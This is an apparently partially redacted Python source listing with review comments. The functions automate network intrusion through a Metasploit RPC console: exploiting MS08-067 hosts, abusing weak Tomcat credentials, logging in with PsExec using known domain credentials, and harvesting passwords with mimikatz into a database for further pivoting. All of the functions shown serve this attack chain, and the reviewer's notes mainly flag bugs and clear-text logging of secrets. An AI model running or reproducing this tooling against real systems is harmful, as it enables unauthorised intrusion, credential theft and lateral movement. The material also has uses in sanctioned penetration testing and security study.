def collectCredentials(footprint_id):
    """Attempt one PsExec login with known creds and harvest what mimikatz returns.

    Flow as visible in the listing: read MySQL settings from connections.conf,
    poll the DB until a Metasploit RPC password is available, (redacted: connect
    to msfrpc and create a console), pull one host/credential row via
    dbfunctions.getHostToLogInTo, run metasploitfunctions.loginWithPsExec,
    record success/failure, store any extracted credentials, destroy the console.

    footprint_id -- scope key passed through to every dbfunctions call.

    NOTE(review): this listing was flattened onto one line and partially
    redacted ("******"); the indentation below is reconstructed and the
    nesting of a few statements (marked) should be confirmed against the
    original file.
    """
    logVal("cred", "started")
    # DB credentials come from a config file resolved relative to the CWD, not
    # the script location; a different working directory silently reads nothing.
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
    db.autocommit(True)
    # Busy-poll (1 s) until another component has written the msfrpc password;
    # there is no timeout, so this spins forever if it never appears.
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db, footprint_id)
    connected = False
    client = None
    console_id = None
    # SECURITY(review): the line below appears to write the msfrpc password
    # ("got pass: ...") into the application log; secrets should never be
    # logged. The text between the two log calls was redacted in the source
    # ("******") -- presumably the msfrpc connect / console.create loop that
    # assigns `client` and `res`; confirm against the original. Note `client`
    # stays None if that loop never succeeds, and nothing below checks it.
    logVal("cred", "got pass: "******"cred", "got res: " + str(res))
    console_id = res['id']
    #while True:
    if True:
        if True:
            # One host/credential row per invocation (the caller re-spawns this
            # function); the `if True:` scaffolding replaces an earlier loop.
            host_data = dbfunctions.getHostToLogInTo(db, footprint_id)
            if host_data == None:
                logVal("cred", "no hosts to log in to. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    # SECURITY(review): logs domain\user : password in clear text.
                    # Also "\{" is not a recognised escape -- fine on Python 2
                    # (kept literally), a DeprecationWarning on 3.x.
                    logVal("cred", "log in to host {0} with creds {1}\{2} : {3}".format(host_data[1], host_data[3], host_data[4], host_data[5]))
                    # Hard-coded interface name; raises KeyError if eth0 is absent.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.loginWithPsExec(client, console_id, lhost, host_data[1], msfpass, host_data[3], host_data[4], host_data[5])
                    # Logged before success is known; the message is misleading
                    # when the login actually failed.
                    logVal("cred", "logged into {0}. looking for creds".format(host_data[1]))
                    loginSuccess = True
                    # Success is inferred only from the absence of
                    # STATUS_LOGON_FAILURE in the console output; any other
                    # failure mode (timeout, access denied, RPC error) is
                    # recorded as a success below.
                    for l in msflog:
                        if l.find("STATUS_LOGON_FAILURE") > -1:
                            loginSuccess = False
                            # nesting reconstructed: a failure is recorded once
                            # per matching output line -- confirm against original
                            logVal("cred", "creds did not work on {0}".format(host_data[1]))
                            dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], False)
                    if loginSuccess:
                        logVal("cred", "creds worked on {0}".format(host_data[1]))
                        dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], True)
                        creds = metasploitfunctions.extractMimikatzCreds(msflog)
                        for cred in creds:
                            # Column order per the helper's own convention
                            # (cred[1], cred[0], cred[2]); trailing fields are
                            # left empty here.
                            dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
                            # SECURITY(review): harvested credentials are written
                            # to the log in clear text as well as to the DB.
                            logVal("cred", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
                #except:
                    #logVal("cred", "an error occurred")
    # Console teardown; the return value is never inspected. Placement at
    # function level is reconstructed -- confirm. If the redacted connect
    # step failed, `client` is None and this raises.
    cleanup = client.call('console.destroy',[console_id])
def vulnExploiter(footprint_id, options):
    """Scheduler loop: for each enabled option, spawn one worker process when a candidate host exists.

    Each worker (exploitMS08067, exploitWeakSqlCreds, exploitWeakTomcatCreds,
    collectCredentials) is started with multiprocessing.Process and joined
    immediately, so the stages run strictly one at a time.

    footprint_id -- scope key passed to every dbfunctions call and each worker.
    options      -- object with boolean attributes exploitMs08067,
                    expoitWeakMsSqlCreds (sic), exploitWeakTomcatCreds, credPivot.

    NOTE(review): listing was flattened onto one line; indentation reconstructed.
    """
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
    db.autocommit(True)
    # Blocks until the msfrpc password exists in the DB; `msfpass` is not used
    # afterwards in this function (each worker fetches it again), so this only
    # serves as a "Metasploit is up" gate.
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db, footprint_id)
    # Never exits on its own; the process must be killed externally.
    while True:
        if options.exploitMs08067:
            # The host found here is only a trigger; the child re-queries and
            # may pick a different row (benign, but worth knowing).
            host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id)
            if host_data == None:
                # Message says 5 s but the only sleep in this loop is 1 s below.
                logVal("ms08", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting ms08"
                p1 = multiprocessing.Process(target=exploitMS08067, args=(footprint_id, ))
                p1.start()
                p1.join()
        # Attribute name is misspelled ("expoit"); it must match whatever
        # builds `options` or this stage is never enabled.
        if options.expoitWeakMsSqlCreds:
            host_data = dbfunctions.getHostVulnerableWeakSqlCreds(db, footprint_id)
            if host_data == None:
                logVal("sql", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting sql"
                p2 = multiprocessing.Process(target=exploitWeakSqlCreds, args=(footprint_id, ))
                p2.start()
                p2.join()
        if options.exploitWeakTomcatCreds:
            host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id)
            if host_data == None:
                logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting tomcat"
                # Reuses the name p2 from the SQL stage; harmless because the
                # previous process was already joined.
                p2 = multiprocessing.Process(target=exploitWeakTomcatCreds, args=(footprint_id, ))
                p2.start()
                p2.join()
        if options.credPivot:
            host_data = dbfunctions.getHostToLogInTo(db, footprint_id)
            if host_data == None:
                logVal("cred", "no hosts to log in to. will check again in 5 seconds")
            else:
                #collectCredentials(footprint_id)
                print "logging in with known creds"
                p = multiprocessing.Process(target=collectCredentials, args=(footprint_id, ))
                p.start()
                p.join()
        # Placement at loop level is reconstructed -- confirm against original.
        time.sleep(1)
def exploitMS08067(footprint_id):
    """Exploit one MS08-067 candidate host via Metasploit and store harvested creds.

    Flow as visible: read MySQL settings, wait for the msfrpc password,
    (redacted: connect and open a console), fetch one host via
    dbfunctions.getHostVulnerableToMS08067, run metasploitfunctions.exploitMS08067,
    store extracted credentials, mark the host exploited.

    footprint_id -- scope key passed through to every dbfunctions call.

    NOTE(review): listing was flattened onto one line and partially redacted
    ("******"); indentation reconstructed, nesting of marked lines to confirm.
    """
    logVal("ms08", "started")
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
    db.autocommit(True)
    # Busy-poll (2 s here, 1 s in the sibling functions) with no timeout.
    msfpass = ""
    while msfpass == "":
        time.sleep(2)
        msfpass = dbfunctions.getMsfPass(db, footprint_id)
    connected = False
    client = None
    console_id = None
    # SECURITY(review): appears to log the msfrpc password ("got pass: ...").
    # The source is redacted between the two log calls ("******"); presumably
    # the connect / console.create loop that assigns `client` and `res` --
    # confirm against the original.
    logVal("ms08", "got pass: "******"ms08", "got res: " + str(res))
    console_id = res['id']
    logVal("ms08", "connected")
    if True:
        #try:
        if True:
            #while True:
            host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id)
            if host_data == None:
                logVal("ms08", "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                try:
                    logVal("ms08", "exploiting host {0}".format(host_data[0]))
                    # Hard-coded interface name; KeyError if eth0 is absent.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.exploitMS08067(client, console_id, lhost, host_data[0], msfpass)
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    for cred in creds:
                        dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
                        # SECURITY(review): harvested credentials logged in clear text.
                        logVal("ms08", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
                    # Marks the host done; if this (or anything above) raises, the
                    # host presumably stays in the candidate set and gets hit again
                    # on the next pass -- risky for an exploit that can crash the
                    # target service.
                    dbfunctions.setHostExploitedDate(db, host_data[1])
                except:
                    # Bare except swallows everything, including KeyboardInterrupt,
                    # and the log tag is "sql" (copy-paste) rather than "ms08", so
                    # errors from this stage are misattributed in the log.
                    logVal("sql", "error exploiting host {0}".format(host_data[0]))
                # Placement of this sleep is reconstructed -- confirm.
                time.sleep(1)
def exploitWeakTomcatCreds(footprint_id):
    """Exploit one host with a known weak Tomcat credential and store harvested creds.

    Flow as visible: read MySQL settings, wait for the msfrpc password,
    (redacted: connect and open a console), fetch one host via
    dbfunctions.getHostVulnerableWeakTomcatCreds, split its "user:pass" column,
    run metasploitfunctions.exploitWeakTomcatCreds, store extracted credentials,
    mark the host exploited.

    footprint_id -- scope key passed through to every dbfunctions call.

    NOTE(review): listing was flattened onto one line and partially redacted
    ("******"); indentation reconstructed. Unlike exploitMS08067 there is no
    try/except here, so any failure propagates and the host is not marked
    exploited.
    """
    logVal("tomcat", "started")
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
    db.autocommit(True)
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db, footprint_id)
    connected = False
    # Names carried over from the SQL stage; they hold the msfrpc client and
    # console id for this Tomcat stage.
    sqlclient = None
    sqlconsole_id = None
    # SECURITY(review): appears to log the msfrpc password ("got pass: ...").
    # Source redacted between the two log calls ("******"); presumably the
    # connect / console.create loop that assigns `sqlclient` and `sqlres` --
    # confirm against the original.
    logVal("tomcat", "got pass: "******"tomcat", "got res: " + str(sqlres))
    sqlconsole_id = sqlres['id']
    if True:
        if True:
            # while True:
            host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id)
            if host_data == None:
                logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    logVal("tomcat", "exploiting host {0}".format(host_data[0]))
                    # Hard-coded interface name; KeyError if eth0 is absent.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    # host_data[3] is assumed to be "user:password"; split(":")[1]
                    # keeps only the segment between the first two colons, so a
                    # password containing ':' is truncated, and a value with no
                    # colon raises IndexError. "<empty>" is the stored marker for
                    # a blank password.
                    msflog = metasploitfunctions.exploitWeakTomcatCreds(sqlclient, sqlconsole_id, lhost, host_data[0], msfpass, host_data[3].split(":")[0], host_data[3].split(":")[1].replace("<empty>", ""))
                    logVal("tomcat", "done exploiting {0}. extracting creds".format(host_data[0]))
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    for cred in creds:
                        dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
                        # SECURITY(review): harvested credentials logged in clear text.
                        logVal("tomcat", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
                    dbfunctions.setHostExploitedDate(db, host_data[1])